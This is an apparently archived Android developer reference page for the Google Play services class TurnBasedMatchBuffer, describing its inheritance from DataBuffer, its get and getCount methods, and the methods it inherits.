<div class="morehover" id="moremenu">
<div class="top"></div>
<div class="mid">
<div class="header">Links</div>
<ul>
<li><a href="https://play.google.com/apps/publish/" target="_googleplay">Google Play Developer Console</a></li>
<li><a href="http://android-developers.blogspot.com/">Android Developers Blog</a></li>
<li><a href="../../../../../../../../about/index.html">About Android</a></li>
</ul>
<div class="header">Android Sites</div>
<ul>
<li><a href="http://www.android.com">Android.com</a></li>
<li class="active"><a>Android Developers</a></li>
<li><a href="http://source.android.com">Android Open Source Project</a></li>
</ul>
<br class="clearfix" />
</div><!-- end 'mid' -->
<div class="bottom"></div>
</div><!-- end 'moremenu' -->
<div class="search" id="search-container">
<div class="search-inner">
<div id="search-btn"></div>
<div class="left"></div>
<form onsubmit="return submit_search()">
<input id="search_autocomplete" type="text" value="" autocomplete="off" name="q"
onfocus="search_focus_changed(this, true)" onblur="search_focus_changed(this, false)"
onkeydown="return search_changed(event, true, '../../../../../../../../')"
onkeyup="return search_changed(event, false, '../../../../../../../../')" />
</form>
<div class="right"></div>
<a class="close hide">close</a>
<div class="left"></div>
<div class="right"></div>
</div><!-- end search-inner -->
</div><!-- end search-container -->
<div class="search_filtered_wrapper reference">
<div class="suggest-card reference no-display">
<ul class="search_filtered">
</ul>
</div>
</div>
<div class="search_filtered_wrapper docs">
<div class="suggest-card dummy no-display"> </div>
<div class="suggest-card develop no-display">
<ul class="search_filtered">
</ul>
<div class="child-card guides no-display">
</div>
<div class="child-card training no-display">
</div>
<div class="child-card samples no-display">
</div>
</div>
<div class="suggest-card design no-display">
<ul class="search_filtered">
</ul>
</div>
<div class="suggest-card distribute no-display">
<ul class="search_filtered">
</ul>
</div>
</div>
</div><!-- end menu-container (search and menu widget) -->
<!-- Expanded quicknav -->
<div id="quicknav" class="col-9">
<ul>
<li class="design">
<ul>
<li><a href="../../../../../../../../design/index.html">Get Started</a></li>
<li><a href="../../../../../../../../design/style/index.html">Style</a></li>
<li><a href="../../../../../../../../design/patterns/index.html">Patterns</a></li>
<li><a href="../../../../../../../../design/building-blocks/index.html">Building Blocks</a></li>
<li><a href="../../../../../../../../design/downloads/index.html">Downloads</a></li>
<li><a href="../../../../../../../../design/videos/index.html">Videos</a></li>
</ul>
</li>
<li class="develop">
<ul>
<li><a href="../../../../../../../../training/index.html"
zh-tw-lang="訓練課程"
zh-cn-lang="培训"
ru-lang="Курсы"
ko-lang="교육"
ja-lang="トレーニング"
es-lang="Capacitación"
>Training</a></li>
<li><a href="../../../../../../../../guide/index.html"
zh-tw-lang="API 指南"
zh-cn-lang="API 指南"
ru-lang="Руководства по API"
ko-lang="API 가이드"
ja-lang="API ガイド"
es-lang="Guías de la API"
>API Guides</a></li>
<li><a href="../../../../../../../../reference/packages.html"
zh-tw-lang="參考資源"
zh-cn-lang="参考"
ru-lang="Справочник"
ko-lang="참조문서"
ja-lang="リファレンス"
es-lang="Referencia"
>Reference</a></li>
<li><a href="../../../../../../../../tools/index.html"
zh-tw-lang="相關工具"
zh-cn-lang="工具"
ru-lang="Инструменты"
ko-lang="도구"
ja-lang="ツール"
es-lang="Herramientas"
>Tools</a>
<ul><li><a href="../../../../../../../../sdk/index.html">Get the SDK</a></li></ul>
</li>
<li><a href="../../../../../../../../google/index.html">Google Services</a>
</li>
</ul>
</li>
<li class="distribute last">
<ul>
<li><a href="../../../../../../../../distribute/googleplay/index.html">Google Play</a></li>
<li><a href="../../../../../../../../distribute/essentials/index.html">Essentials</a></li>
<li><a href="../../../../../../../../distribute/users/index.html">Get Users</a></li>
<li><a href="../../../../../../../../distribute/engage/index.html">Engage & Retain</a></li>
<li><a href="../../../../../../../../distribute/monetize/index.html">Monetize</a></li>
<li><a href="../../../../../../../../distribute/tools/index.html">Tools & Reference</a></li>
<li><a href="../../../../../../../../distribute/stories/index.html">Developer Stories</a></li>
</ul>
</li>
</ul>
</div><!-- /Expanded quicknav -->
</div><!-- end header-wrap.wrap -->
</div><!-- end header -->
<!-- Secondary x-nav -->
<div id="nav-x">
<div class="wrap">
<ul class="nav-x col-9 develop" style="width:100%">
<li class="training"><a href="../../../../../../../../training/index.html"
zh-tw-lang="訓練課程"
zh-cn-lang="培训"
ru-lang="Курсы"
ko-lang="교육"
ja-lang="トレーニング"
es-lang="Capacitación"
>Training</a></li>
<li class="guide"><a href="../../../../../../../../guide/index.html"
zh-tw-lang="API 指南"
zh-cn-lang="API 指南"
ru-lang="Руководства по API"
ko-lang="API 가이드"
ja-lang="API ガイド"
es-lang="Guías de la API"
>API Guides</a></li>
<li class="reference"><a href="../../../../../../../../reference/packages.html"
zh-tw-lang="參考資源"
zh-cn-lang="参考"
ru-lang="Справочник"
ko-lang="참조문서"
ja-lang="リファレンス"
es-lang="Referencia"
>Reference</a></li>
<li class="tools"><a href="../../../../../../../../tools/index.html"
zh-tw-lang="相關工具"
zh-cn-lang="工具"
ru-lang="Инструменты"
ko-lang="도구"
ja-lang="ツール"
es-lang="Herramientas"
>Tools</a></li>
<li class="google"><a href="../../../../../../../../google/index.html"
>Google Services</a>
</li>
</ul>
</div>
</div>
<!-- /Sendondary x-nav -->
<div id="searchResults" class="wrap" style="display:none;">
<h2 id="searchTitle">Results</h2>
<div id="leftSearchControl" class="search-control">Loading...</div>
</div>
</div> <!--end header-wrapper -->
<div id="sticky-header">
<div>
<a class="logo" href="#top"></a>
<a class="top" href="#top"></a>
<ul class="breadcrumb">
<li class="current">TurnBasedMatchBuffer</li>
</ul>
</div>
</div>
<div class="wrap clearfix" id="body-content">
<div class="col-4" id="side-nav" itemscope itemtype="http://schema.org/SiteNavigationElement">
<div id="devdoc-nav">
<div id="api-nav-header">
<div id="api-level-toggle">
<label for="apiLevelCheckbox" class="disabled"
title="Select your target API level to dim unavailable APIs">API level: </label>
<div class="select-wrapper">
<select id="apiLevelSelector">
<!-- option elements added by buildApiLevelSelector() -->
</select>
</div>
</div><!-- end toggle -->
<div id="api-nav-title">Android APIs</div>
</div><!-- end nav header -->
<script>
var SINCE_DATA = [ ];
buildApiLevelSelector();
</script>
<div id="swapper">
<div id="nav-panels">
<div id="resize-packages-nav">
<div id="packages-nav" class="scroll-pane">
<ul>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/package-summary.html">com.google.android.gms</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/actions/package-summary.html">com.google.android.gms.actions</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/ads/package-summary.html">com.google.android.gms.ads</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/ads/doubleclick/package-summary.html">com.google.android.gms.ads.doubleclick</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/ads/identifier/package-summary.html">com.google.android.gms.ads.identifier</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/ads/mediation/package-summary.html">com.google.android.gms.ads.mediation</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/ads/mediation/admob/package-summary.html">com.google.android.gms.ads.mediation.admob</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/ads/mediation/customevent/package-summary.html">com.google.android.gms.ads.mediation.customevent</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/ads/purchase/package-summary.html">com.google.android.gms.ads.purchase</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/ads/search/package-summary.html">com.google.android.gms.ads.search</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/analytics/package-summary.html">com.google.android.gms.analytics</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/analytics/ecommerce/package-summary.html">com.google.android.gms.analytics.ecommerce</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/appindexing/package-summary.html">com.google.android.gms.appindexing</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/appstate/package-summary.html">com.google.android.gms.appstate</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/auth/package-summary.html">com.google.android.gms.auth</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/cast/package-summary.html">com.google.android.gms.cast</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/common/package-summary.html">com.google.android.gms.common</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/common/annotation/package-summary.html">com.google.android.gms.common.annotation</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/common/api/package-summary.html">com.google.android.gms.common.api</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/common/data/package-summary.html">com.google.android.gms.common.data</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/common/images/package-summary.html">com.google.android.gms.common.images</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/drive/package-summary.html">com.google.android.gms.drive</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/drive/events/package-summary.html">com.google.android.gms.drive.events</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/drive/metadata/package-summary.html">com.google.android.gms.drive.metadata</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/drive/query/package-summary.html">com.google.android.gms.drive.query</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/drive/widget/package-summary.html">com.google.android.gms.drive.widget</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/games/package-summary.html">com.google.android.gms.games</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/games/achievement/package-summary.html">com.google.android.gms.games.achievement</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/games/event/package-summary.html">com.google.android.gms.games.event</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/games/leaderboard/package-summary.html">com.google.android.gms.games.leaderboard</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/games/multiplayer/package-summary.html">com.google.android.gms.games.multiplayer</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/games/multiplayer/realtime/package-summary.html">com.google.android.gms.games.multiplayer.realtime</a></li>
<li class="selected api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/games/multiplayer/turnbased/package-summary.html">com.google.android.gms.games.multiplayer.turnbased</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/games/quest/package-summary.html">com.google.android.gms.games.quest</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/games/request/package-summary.html">com.google.android.gms.games.request</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/games/snapshot/package-summary.html">com.google.android.gms.games.snapshot</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/gcm/package-summary.html">com.google.android.gms.gcm</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/identity/intents/package-summary.html">com.google.android.gms.identity.intents</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/identity/intents/model/package-summary.html">com.google.android.gms.identity.intents.model</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/location/package-summary.html">com.google.android.gms.location</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/maps/package-summary.html">com.google.android.gms.maps</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/maps/model/package-summary.html">com.google.android.gms.maps.model</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/panorama/package-summary.html">com.google.android.gms.panorama</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/plus/package-summary.html">com.google.android.gms.plus</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/plus/model/moments/package-summary.html">com.google.android.gms.plus.model.moments</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/plus/model/people/package-summary.html">com.google.android.gms.plus.model.people</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/security/package-summary.html">com.google.android.gms.security</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/tagmanager/package-summary.html">com.google.android.gms.tagmanager</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/wallet/package-summary.html">com.google.android.gms.wallet</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/wallet/fragment/package-summary.html">com.google.android.gms.wallet.fragment</a></li>
<li class="api apilevel-">
<a href="../../../../../../../../reference/com/google/android/gms/wearable/package-summary.html">com.google.android.gms.wearable</a></li>
</ul><br/>
</div> <!-- end packages-nav -->
</div> <!-- end resize-packages -->
<div id="classes-nav" class="scroll-pane">
<ul>
<li><h2>Interfaces</h2>
<ul>
<li class="api apilevel-"><a href="../../../../../../../../reference/com/google/android/gms/games/multiplayer/turnbased/OnTurnBasedMatchUpdateReceivedListener.html">OnTurnBasedMatchUpdateReceivedListener</a></li>
<li class="api apilevel-"><a href="../../../../../../../../reference/com/google/android/gms/games/multiplayer/turnbased/TurnBasedMatch.html">TurnBasedMatch</a></li>
<li class="api apilevel-"><a href="../../../../../../../../reference/com/google/android/gms/games/multiplayer/turnbased/TurnBasedMultiplayer.html">TurnBasedMultiplayer</a></li>
<li class="api apilevel-"><a href="../../../../../../../../reference/com/google/android/gms/games/multiplayer/turnbased/TurnBasedMultiplayer.CancelMatchResult.html">TurnBasedMultiplayer.CancelMatchResult</a></li>
<li class="api apilevel-"><a href="../../../../../../../../reference/com/google/android/gms/games/multiplayer/turnbased/TurnBasedMultiplayer.InitiateMatchResult.html">TurnBasedMultiplayer.InitiateMatchResult</a></li>
<li class="api apilevel-"><a href="../../../../../../../../reference/com/google/android/gms/games/multiplayer/turnbased/TurnBasedMultiplayer.LeaveMatchResult.html">TurnBasedMultiplayer.LeaveMatchResult</a></li>
<li class="api apilevel-"><a href="../../../../../../../../reference/com/google/android/gms/games/multiplayer/turnbased/TurnBasedMultiplayer.LoadMatchesResult.html">TurnBasedMultiplayer.LoadMatchesResult</a></li>
<li class="api apilevel-"><a href="../../../../../../../../reference/com/google/android/gms/games/multiplayer/turnbased/TurnBasedMultiplayer.LoadMatchResult.html">TurnBasedMultiplayer.LoadMatchResult</a></li>
<li class="api apilevel-"><a href="../../../../../../../../reference/com/google/android/gms/games/multiplayer/turnbased/TurnBasedMultiplayer.UpdateMatchResult.html">TurnBasedMultiplayer.UpdateMatchResult</a></li>
</ul>
</li>
<li><h2>Classes</h2>
<ul>
<li class="api apilevel-"><a href="../../../../../../../../reference/com/google/android/gms/games/multiplayer/turnbased/LoadMatchesResponse.html">LoadMatchesResponse</a></li>
<li class="selected api apilevel-"><a href="../../../../../../../../reference/com/google/android/gms/games/multiplayer/turnbased/TurnBasedMatchBuffer.html">TurnBasedMatchBuffer</a></li>
<li class="api apilevel-"><a href="../../../../../../../../reference/com/google/android/gms/games/multiplayer/turnbased/TurnBasedMatchConfig.html">TurnBasedMatchConfig</a></li>
<li class="api apilevel-"><a href="../../../../../../../../reference/com/google/android/gms/games/multiplayer/turnbased/TurnBasedMatchConfig.Builder.html">TurnBasedMatchConfig.Builder</a></li>
<li class="api apilevel-"><a href="../../../../../../../../reference/com/google/android/gms/games/multiplayer/turnbased/TurnBasedMatchEntity.html">TurnBasedMatchEntity</a></li>
</ul>
</li>
</ul><br/>
</div><!-- end classes -->
</div><!-- end nav-panels -->
<div id="nav-tree" style="display:none" class="scroll-pane">
<div id="tree-list"></div>
</div><!-- end nav-tree -->
</div><!-- end swapper -->
<div id="nav-swap">
<a class="fullscreen">fullscreen</a>
<a href='#' onclick='swapNav();return false;'><span id='tree-link'>Use Tree Navigation</span><span id='panel-link' style='display:none'>Use Panel Navigation</span></a>
</div>
</div> <!-- end devdoc-nav -->
</div> <!-- end side-nav -->
<script type="text/javascript">
// init fullscreen based on user pref
var fullscreen = readCookie("fullscreen");
if (fullscreen != 0) {
if (fullscreen == "false") {
toggleFullscreen(false);
} else {
toggleFullscreen(true);
}
}
// init nav version for mobile
if (isMobile) {
swapNav(); // tree view should be used on mobile
$('#nav-swap').hide();
} else {
chooseDefaultNav();
if ($("#nav-tree").is(':visible')) {
init_default_navtree("../../../../../../../../");
}
}
// scroll the selected page into view
$(document).ready(function() {
scrollIntoView("packages-nav");
scrollIntoView("classes-nav");
});
</script>
<div class="col-12" id="doc-col">
<div id="api-info-block">
<div class="sum-details-links">
Summary:
<a href="#pubmethods">Methods</a>
| <a href="#inhmethods">Inherited Methods</a>
| <a href="#" onclick="return toggleAllClassInherited()" id="toggleAllClassInherited">[Expand All]</a>
</div><!-- end sum-details-links -->
<div class="api-level">
</div>
</div><!-- end api-info-block -->
<!-- ======== START OF CLASS DATA ======== -->
<div id="jd-header">
public
final
class
<h1 itemprop="name">TurnBasedMatchBuffer</h1>
extends <a href="../../../../../../../../reference/com/google/android/gms/common/data/DataBuffer.html">DataBuffer</a><T><br/>
</div><!-- end header -->
<div id="naMessage"></div>
<div id="jd-content" class="api apilevel-">
<table class="jd-inheritance-table">
<tr>
<td colspan="3" class="jd-inheritance-class-cell"><a href="http://developer.android.com/reference/java/lang/Object.html">java.lang.Object</a></td>
</tr>
<tr>
<td class="jd-inheritance-space"> ↳</td>
<td colspan="2" class="jd-inheritance-class-cell"><a href="../../../../../../../../reference/com/google/android/gms/common/data/DataBuffer.html">com.google.android.gms.common.data.DataBuffer</a><T></td>
</tr>
<tr>
<td class="jd-inheritance-space"> </td>
<td class="jd-inheritance-space"> ↳</td>
<td colspan="1" class="jd-inheritance-class-cell">com.google.android.gms.games.multiplayer.turnbased.TurnBasedMatchBuffer</td>
</tr>
</table>
<div class="jd-descr">
<h2>Class Overview</h2>
<p itemprop="articleBody"><code><a href="../../../../../../../../reference/com/google/android/gms/common/data/DataBuffer.html">DataBuffer</a></code> implementation containing TurnBasedMatch details.
</p>
</div><!-- jd-descr -->
<div class="jd-descr">
<h2>Summary</h2>
<!-- ========== METHOD SUMMARY =========== -->
<table id="pubmethods" class="jd-sumtable"><tr><th colspan="12">Public Methods</th></tr>
<tr class="alt-color api apilevel-" >
<td class="jd-typecol"><nobr>
final
T</nobr>
</td>
<td class="jd-linkcol" width="100%"><nobr>
<span class="sympad"><a href="../../../../../../../../reference/com/google/android/gms/games/multiplayer/turnbased/TurnBasedMatchBuffer.html#get(int)">get</a></span>(int position)</nobr>
<div class="jd-descrdiv">Get the item at the specified position.</div>
</td></tr>
<tr class=" api apilevel-" >
<td class="jd-typecol"><nobr>
int</nobr>
</td>
<td class="jd-linkcol" width="100%"><nobr>
<span class="sympad"><a href="../../../../../../../../reference/com/google/android/gms/games/multiplayer/turnbased/TurnBasedMatchBuffer.html#getCount()">getCount</a></span>()</nobr>
</td></tr>
</table>
<!-- ========== METHOD SUMMARY =========== -->
<table id="inhmethods" class="jd-sumtable"><tr><th>
<a href="#" class="toggle-all" onclick="return toggleAllInherited(this, null)">[Expand]</a>
<div style="clear:left;">Inherited Methods</div></th></tr>
<tr class="api apilevel-" >
<td colspan="12">
<a href="#" onclick="return toggleInherited(this, null)" id="inherited-methods-com.google.android.gms.common.data.DataBuffer" class="jd-expando-trigger closed"
><img id="inherited-methods-com.google.android.gms.common.data.DataBuffer-trigger"
src="../../../../../../../../assets/images/triangle-closed.png"
class="jd-expando-trigger-img" /></a>
From class
<a href="../../../../../../../../reference/com/google/android/gms/common/data/DataBuffer.html">com.google.android.gms.common.data.DataBuffer</a>
<div id="inherited-methods-com.google.android.gms.common.data.DataBuffer">
<div id="inherited-methods-com.google.android.gms.common.data.DataBuffer-list"
class="jd-inheritedlinks">
</div>
<div id="inherited-methods-com.google.android.gms.common.data.DataBuffer-summary" style="display: none;">
<table class="jd-sumtable-expando">
<tr class="alt-color api apilevel-" >
<td class="jd-typecol"><nobr>
final
void</nobr>
</td>
<td class="jd-linkcol" width="100%"><nobr>
<span class="sympad"><a href="../../../../../../../../reference/com/google/android/gms/common/data/DataBuffer.html#close()">close</a></span>()</nobr>
<div class="jd-descrdiv"><em>
This method is deprecated.
use <code><a href="../../../../../../../../reference/com/google/android/gms/common/data/DataBuffer.html#release()">release()</a></code> instead
</em></div>
</td></tr>
<tr class=" api apilevel-" >
<td class="jd-typecol"><nobr>
int</nobr>
</td>
<td class="jd-linkcol" width="100%"><nobr>
<span class="sympad"><a href="../../../../../../../../reference/com/google/android/gms/common/data/DataBuffer.html#describeContents()">describeContents</a></span>()</nobr>
</td></tr>
<tr class="alt-color api apilevel-" >
<td class="jd-typecol"><nobr>
abstract
T</nobr>
</td>
<td class="jd-linkcol" width="100%"><nobr>
<span class="sympad"><a href="../../../../../../../../reference/com/google/android/gms/common/data/DataBuffer.html#get(int)">get</a></span>(int position)</nobr>
<div class="jd-descrdiv">Get the item at the specified position.</div>
</td></tr>
<tr class=" api apilevel-" >
<td class="jd-typecol"><nobr>
int</nobr>
</td>
<td class="jd-linkcol" width="100%"><nobr>
<span class="sympad"><a href="../../../../../../../../reference/com/google/android/gms/common/data/DataBuffer.html#getCount()">getCount</a></span>()</nobr>
</td></tr>
<tr class="alt-color api apilevel-" >
<td class="jd-typecol"><nobr>
boolean</nobr>
</td>
<td class="jd-linkcol" width="100%"><nobr>
<span class="sympad"><a href="../../../../../../../../reference/com/google/android/gms/common/data/DataBuffer.html#isClosed()">isClosed</a></span>()</nobr>
<div class="jd-descrdiv"><em>
This method is deprecated.
<code><a href="../../../../../../../../reference/com/google/android/gms/common/data/DataBuffer.html#release()">release()</a></code> is idempotent, and so is safe to call multiple times
</em></div>
</td></tr>
<tr class=" api apilevel-" >
<td class="jd-typecol"><nobr>
<a href="http://developer.android.com/reference/java/util/Iterator.html">Iterator</a><T></nobr>
</td>
<td class="jd-linkcol" width="100%"><nobr>
<span class="sympad"><a href="../../../../../../../../reference/com/google/android/gms/common/data/DataBuffer.html#iterator()">iterator</a></span>()</nobr>
</td></tr>
<tr class="alt-color api apilevel-" >
<td class="jd-typecol"><nobr>
void</nobr>
</td>
<td class="jd-linkcol" width="100%"><nobr>
<span class="sympad"><a href="../../../../../../../../reference/com/google/android/gms/common/data/DataBuffer.html#release()">release</a></span>()</nobr>
<div class="jd-descrdiv">Releases resources used by the buffer.</div>
</td></tr>
<tr class=" api apilevel-" >
<td class="jd-typecol"><nobr>
<a href="http://developer.android.com/reference/java/util/Iterator.html">Iterator</a><T></nobr>
</td>
<td class="jd-linkcol" width="100%"><nobr>
<span class="sympad"><a href="../../../../../../../../reference/com/google/android/gms/common/data/DataBuffer.html#singleRefIterator()">singleRefIterator</a></span>()</nobr>
<div class="jd-descrdiv">In order to use this one should correctly override setDataRow(int)
in his DataBufferRef implementation.</div>
</td></tr>
</table>
</div>
</div>
</td></tr>
<tr class="api apilevel-" >
<td colspan="12">
<a href="#" onclick="return toggleInherited(this, null)" id="inherited-methods-java.lang.Object" class="jd-expando-trigger closed"
><img id="inherited-methods-java.lang.Object-trigger"
src="../../../../../../../../assets/images/triangle-closed.png"
class="jd-expando-trigger-img" /></a>
From class
<a href="http://developer.android.com/reference/java/lang/Object.html">java.lang.Object</a>
<div id="inherited-methods-java.lang.Object">
<div id="inherited-methods-java.lang.Object-list"
class="jd-inheritedlinks">
</div>
<div id="inherited-methods-java.lang.Object-summary" style="display: none;">
<table class="jd-sumtable-expando">
<tr class="alt-color api apilevel-" >
<td class="jd-typecol"><nobr>
<a href="http://developer.android.com/reference/java/lang/Object.html">Object</a></nobr>
</td>
<td class="jd-linkcol" width="100%"><nobr>
<span class="sympad">clone</span>()</nobr>
</td></tr>
<tr class=" api apilevel-" >
<td class="jd-typecol"><nobr>
boolean</nobr>
</td>
<td class="jd-linkcol" width="100%"><nobr>
<span class="sympad">equals</span>(<a href="http://developer.android.com/reference/java/lang/Object.html">Object</a> arg0)</nobr>
</td></tr>
<tr class="alt-color api apilevel-" >
<td class="jd-typecol"><nobr>
void</nobr>
</td>
<td class="jd-linkcol" width="100%"><nobr>
<span class="sympad">finalize</span>()</nobr>
</td></tr>
<tr class=" api apilevel-" >
<td class="jd-typecol"><nobr>
final
<a href="http://developer.android.com/reference/java/lang/Class.html">Class</a><?></nobr>
</td>
<td class="jd-linkcol" width="100%"><nobr>
<span class="sympad">getClass</span>()</nobr>
</td></tr>
<tr class="alt-color api apilevel-" >
<td class="jd-typecol"><nobr>
int</nobr>
</td>
<td class="jd-linkcol" width="100%"><nobr>
<span class="sympad">hashCode</span>()</nobr>
</td></tr>
<tr class=" api apilevel-" >
<td class="jd-typecol"><nobr>
final
void</nobr>
</td>
<td class="jd-linkcol" width="100%"><nobr>
<span class="sympad">notify</span>()</nobr>
</td></tr>
<tr class="alt-color api apilevel-" >
<td class="jd-typecol"><nobr>
final
void</nobr>
</td>
<td class="jd-linkcol" width="100%"><nobr>
<span class="sympad">notifyAll</span>()</nobr>
</td></tr>
<tr class=" api apilevel-" >
<td class="jd-typecol"><nobr>
<a href="http://developer.android.com/reference/java/lang/String.html">String</a></nobr>
</td>
<td class="jd-linkcol" width="100%"><nobr>
<span class="sympad">toString</span>()</nobr>
</td></tr>
<tr class="alt-color api apilevel-" >
<td class="jd-typecol"><nobr>
final
void</nobr>
</td>
<td class="jd-linkcol" width="100%"><nobr>
<span class="sympad">wait</span>()</nobr>
</td></tr>
<tr class=" api apilevel-" >
<td class="jd-typecol"><nobr>
final
void</nobr>
</td>
<td class="jd-linkcol" width="100%"><nobr>
<span class="sympad">wait</span>(long arg0, int arg1)</nobr>
</td></tr>
<tr class="alt-color api apilevel-" >
<td class="jd-typecol"><nobr>
final
void</nobr>
</td>
<td class="jd-linkcol" width="100%"><nobr>
<span class="sympad">wait</span>(long arg0)</nobr>
</td></tr>
</table>
</div>
</div>
</td></tr>
<tr class="api apilevel-" >
<td colspan="12">
<a href="#" onclick="return toggleInherited(this, null)" id="inherited-methods-com.google.android.gms.common.api.Releasable" class="jd-expando-trigger closed"
><img id="inherited-methods-com.google.android.gms.common.api.Releasable-trigger"
src="../../../../../../../../assets/images/triangle-closed.png"
class="jd-expando-trigger-img" /></a>
From interface
<a href="../../../../../../../../reference/com/google/android/gms/common/api/Releasable.html">com.google.android.gms.common.api.Releasable</a>
<div id="inherited-methods-com.google.android.gms.common.api.Releasable">
<div id="inherited-methods-com.google.android.gms.common.api.Releasable-list"
class="jd-inheritedlinks">
</div>
<div id="inherited-methods-com.google.android.gms.common.api.Releasable-summary" style="display: none;">
<table class="jd-sumtable-expando">
<tr class="alt-color api apilevel-" >
<td class="jd-typecol"><nobr>
abstract
void</nobr>
</td>
<td class="jd-linkcol" width="100%"><nobr>
<span class="sympad"><a href="../../../../../../../../reference/com/google/android/gms/common/api/Releasable.html#release()">release</a></span>()</nobr>
</td></tr>
</table>
</div>
</div>
</td></tr>
<tr class="api apilevel-" >
<td colspan="12">
<a href="#" onclick="return toggleInherited(this, null)" id="inherited-methods-java.lang.Iterable" class="jd-expando-trigger closed"
><img id="inherited-methods-java.lang.Iterable-trigger"
src="../../../../../../../../assets/images/triangle-closed.png"
class="jd-expando-trigger-img" /></a>
From interface
<a href="http://developer.android.com/reference/java/lang/Iterable.html">java.lang.Iterable</a>
<div id="inherited-methods-java.lang.Iterable">
<div id="inherited-methods-java.lang.Iterable-list"
class="jd-inheritedlinks">
</div>
<div id="inherited-methods-java.lang.Iterable-summary" style="display: none;">
<table class="jd-sumtable-expando">
<tr class="alt-color api apilevel-" >
<td class="jd-typecol"><nobr>
abstract
<a href="http://developer.android.com/reference/java/util/Iterator.html">Iterator</a><T></nobr>
</td>
<td class="jd-linkcol" width="100%"><nobr>
<span class="sympad">iterator</span>()</nobr>
</td></tr>
</table>
</div>
</div>
</td></tr>
</table>
</div><!-- jd-descr (summary) -->
<!-- Details -->
<!-- XML Attributes -->
<!-- Enum Values -->
<!-- Constants -->
<!-- Fields -->
<!-- Public ctors -->
<!-- ========= CONSTRUCTOR DETAIL ======== -->
<!-- Protected ctors -->
<!-- ========= METHOD DETAIL ======== -->
<!-- Public methdos -->
<h2>Public Methods</h2>
<A NAME="get(int)"></A>
<div class="jd-details api apilevel-">
<h4 class="jd-details-title">
<span class="normal">
public
final
T
</span>
<span class="sympad">get</span>
<span class="normal">(int position)</span>
</h4>
<div class="api-level">
<div></div>
</div>
<div class="jd-details-descr">
<div class="jd-tagdata jd-tagdescr"><p>Get the item at the specified position. Note that the objects returned from subsequent
invocations of this method for the same position may not be identical objects, but will be
equal in value. In other words:
<p>
<code>buffer.get(i) == buffer.get(i)</code> may return false.
<p>
<code>buffer.get(i).equals(buffer.get(i))</code> will return true.</p></div>
<div class="jd-tagdata">
<h5 class="jd-tagtitle">Parameters</h5>
<table class="jd-tagtable">
<tr>
<th>position</td>
<td>The position of the item to retrieve.</td>
</tr>
</table>
</div>
<div class="jd-tagdata">
<h5 class="jd-tagtitle">Returns</h5>
<ul class="nolist"><li>the item at <code>position</code> in this buffer.
</li></ul>
</div>
</div>
</div>
<A NAME="getCount()"></A>
<div class="jd-details api apilevel-">
<h4 class="jd-details-title">
<span class="normal">
public
int
</span>
<span class="sympad">getCount</span>
<span class="normal">()</span>
</h4>
<div class="api-level">
<div></div>
</div>
<div class="jd-details-descr">
<div class="jd-tagdata jd-tagdescr"><p></p></div>
</div>
</div>
<!-- ========= METHOD DETAIL ======== -->
